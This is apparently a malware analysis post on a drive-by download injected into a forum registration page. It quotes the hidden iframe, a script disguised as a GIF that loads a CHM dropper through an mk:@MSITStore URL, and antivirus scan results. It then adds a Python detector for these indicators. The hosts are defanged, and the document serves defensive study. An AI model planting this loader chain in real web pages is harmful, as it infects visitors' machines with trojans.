Endurer (original), version 1
Web page: hxxp://www.****ai49.com/bbs/reg.asp
Inserted code (two instances): <iframe height=0 width=0 src="hxxp://down.***gament.net/q/f"></iframe>
The code at hxxp://down.***gament.net/q/f is:
<script language="JavaScript" src="ah.js"></script>
The code in ah.js is:
GIF89a
var gif89a=document.location.href;gif89a=gif89a.substring(0,gif89a.lastIndexOf('/'));document.write('<object width=0 height=0 style="display:none;" type="text/x-scriptlet" data="mk:%40msitstore%3amhtml%3ac%3A//%2emht%21'+gif89a+'%2f1.js:/%23"></object>');
The file masquerades as a GIF (it starts with the GIF89a header), then downloads and runs 1.js.
1.js is actually a CHM file, which drops and runs an .exe file. Kaspersky reports it as Trojan-Downloader.Win32.Delf.aet; Rising reports it as Trojan.DL.Small.hm.
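An added detection example (not from the original post) that flags the indicators this chain relies on: zero-size iframes, a GIF header on a file that is really script, text/x-scriptlet objects, and URL-encoded mk:@MSITStore / mhtml: data URLs. The sample inputs are constructed from the fragments above with placeholder hostnames.

```python
import re
from urllib.parse import unquote

# Constructed samples modelled on the injected iframe and on ah.js (hosts are placeholders).
SAMPLE_PAGE = '<html><iframe height=0 width=0 src="http://down.example.invalid/q/f"></iframe></html>'
SAMPLE_AHJS = (
    "GIF89a\n"
    "var gif89a=document.location.href;"
    "document.write('<object width=0 height=0 style=\"display:none;\" "
    "type=\"text/x-scriptlet\" data=\"mk:%40msitstore%3amhtml%3ac%3A//%2emht%21'"
    "+gif89a+'%2f1.js:/%23\"></object>');"
)


def find_indicators(content: str) -> list:
    """Return (indicator, detail) tuples for the drive-by patterns described above."""
    hits = []
    # 1. iframes with a zero height or width: invisible loaders.
    for m in re.finditer(r'<iframe\b[^>]*>', content, re.I):
        tag = m.group(0)
        if re.search(r'\b(height|width)\s*=\s*["\']?0\b', tag, re.I):
            hits.append(('hidden_iframe', tag))
    # 2. A GIF signature on content that goes on to behave like script.
    if content.startswith(('GIF89a', 'GIF87a')) and re.search(r'\bdocument\.write\b|<script', content, re.I):
        hits.append(('gif_header_on_script', content[:6]))
    # 3. <object type="text/x-scriptlet"> elements.
    for m in re.finditer(r'type\s*=\s*["\']text/x-scriptlet', content, re.I):
        hits.append(('scriptlet_object', m.group(0)))
    # 4. data= attributes that decode to an mk:@MSITStore or mhtml: URL (CHM/MHTML loader).
    for m in re.finditer(r'data\s*=\s*["\']([^"\']+)', content, re.I):
        decoded = unquote(m.group(1))
        if re.search(r'mk:@msitstore|mhtml:', decoded, re.I):
            hits.append(('msitstore_url', decoded))
    return hits


if __name__ == '__main__':
    for name, sample in (('page', SAMPLE_PAGE), ('ah.js', SAMPLE_AHJS)):
        for kind, detail in find_indicators(sample):
            print(f'{name}: {kind}: {detail}')
```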
File: 1.js
Status: Infected/malware
MD5: 617449ed78325096128e604f1e9f9d30
Packers detected: -

Scanner results:
AntiVir: Found Heuristic/Trojan.Downloader (probable variant)
Arcavir: Found Trojan.Downloader.Delf.AET
Avast: Found nothing
AVG AntiVirus: Found nothing
BitDefender: Found Trojan.HTML.Gamect.A, Trojan.Downloader.Delf.AET
ClamAV: Found Exploit.HTML.ObjCode-2
Dr.Web: Found Exploit.CodeBase, Trojan.DownLoader.6966
F-Prot AntiVirus: Found HTML/ObjCode@expl
Fortinet: Found nothing
Kaspersky Anti-Virus: Found Trojan-Downloader.Win32.Delf.aet
NOD32: Found Win32/TrojanDownloader.Small.AAO, Win32/TrojanDownloader.Delf.AET
Norman Virus Control: Found nothing
UNA: Found nothing
VirusBuster: Found nothing
VBA32: Found Trojan-Downloader.Win32.Delf.aet